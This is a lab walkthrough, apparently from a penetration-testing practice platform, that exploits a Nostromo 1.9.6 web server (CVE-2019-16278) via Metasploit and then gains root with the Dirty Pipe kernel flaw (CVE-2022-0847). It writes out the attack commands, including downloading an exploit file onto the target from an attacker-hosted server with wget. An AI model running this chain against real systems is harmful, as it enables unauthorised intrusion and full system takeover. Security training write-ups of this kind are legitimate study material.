Post

Remote Code Execution – Nostromo Exploit to Root via Dirty Pipe | Glitch

Posted Updated
Nostromo Exploitation
Nostromo Exploitation
By
2 min read
Remote Code Execution – Nostromo Exploit to Root via Dirty Pipe | Glitch

Overview

This lab focuses on exploiting a vulnerable Nostromo web server to gain initial access and then leveraging a Linux kernel vulnerability to escalate privileges to root.

The attack chain demonstrates how outdated services combined with vulnerable kernels can lead to full system compromise.

Objective

  • Perform service enumeration
  • Identify vulnerable web server
  • Exploit Nostromo RCE vulnerability
  • Escalate privileges using a kernel exploit

Reconnaissance

Nmap Scan

1

nmap -sV goldnertech.hv

Result:

1
2
3

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian
80/tcp open  http    nostromo 1.9.6

The target is running Nostromo 1.9.6, which is known to be vulnerable. Vulnerability Identification Search for available exploits:

1

searchsploit nostromo

Result:

1

nostromo 1.9.6 - Remote Code Execution

Associated vulnerability:

  • CVE-2019-16278 — Nostromo Directory Traversal → RCE Exploitation Metasploit Exploit
1
2
3

msfconsole
search nostromo
use exploit/multi/http/nostromo_code_exec

Set required parameters:

1
2

set RHOSTS goldnertech.hv
set LHOST <your_ip>

Check target:

1

check

Run exploit:

1

exploit

Initial Access

1

whoami

1

www-data

We now have a low-privileged shell. Privilege Escalation Kernel Enumeration

1

uname -a

1

Linux debian 5.11.0-051100-generic

This kernel version is vulnerable to:

  • CVE-2022-0847 (Dirty Pipe) Stabilizing Shell
1

python3 -c 'import pty; pty.spawn("/bin/bash")'

Preparing Exploit On attacker machine:

1

nano exploit.c

Host the file:

1

python3 -m http.server 8000

On target machine:

1
2

cd /tmp
wget http://<attacker_ip>:8000/exploit.c

Compile exploit:

1

gcc exploit.c -o exploit

Identify SUID Binaries

1

find / -perm -4000 2>/dev/null

Example Output:

1
2
3

/usr/bin/su
/usr/bin/passwd
/usr/bin/mount

Exploiting Dirty Pipe Run exploit with a SUID binary:

1

./exploit /usr/bin/su

Root Access

1

whoami

1

root

Privilege escalation successful. Proof of Exploitation

  • Initial foothold via Nostromo RCE
  • Shell obtained as www-data
  • Kernel exploit executed successfully
  • Root shell obtained Impact
  • Remote code execution via vulnerable web server
  • Full privilege escalation using kernel exploit
  • Complete system compromise Mitigation
  • Upgrade Nostromo to a secure version
  • Apply kernel patches (Dirty Pipe fix)
  • Restrict exposure of web services
  • Monitor for abnormal process execution
  • Follow least privilege principles Real-World Insight Nostromo is a lightweight web server that is often overlooked during patch management. Vulnerabilities like CVE-2019-16278 allow attackers to gain immediate footholds. Kernel-level exploits such as Dirty Pipe are especially dangerous because they bypass traditional privilege boundaries and lead directly to root access. Key Takeaways
  • Always check service versions for public exploits
  • RCE vulnerabilities often provide quick entry points
  • Kernel exploits can turn low access into full control
  • Chaining vulnerabilities is key in real-world attacks
Penetration Testing, CVE-2019-16278 (Nostromo RCE)
remote-code-execution nostromo cve-2019-16278 dirty-pipe cve-2022-0847 privilege-escalation kernel-exploit linux hackviser
This post is licensed under CC BY 4.0 by the author.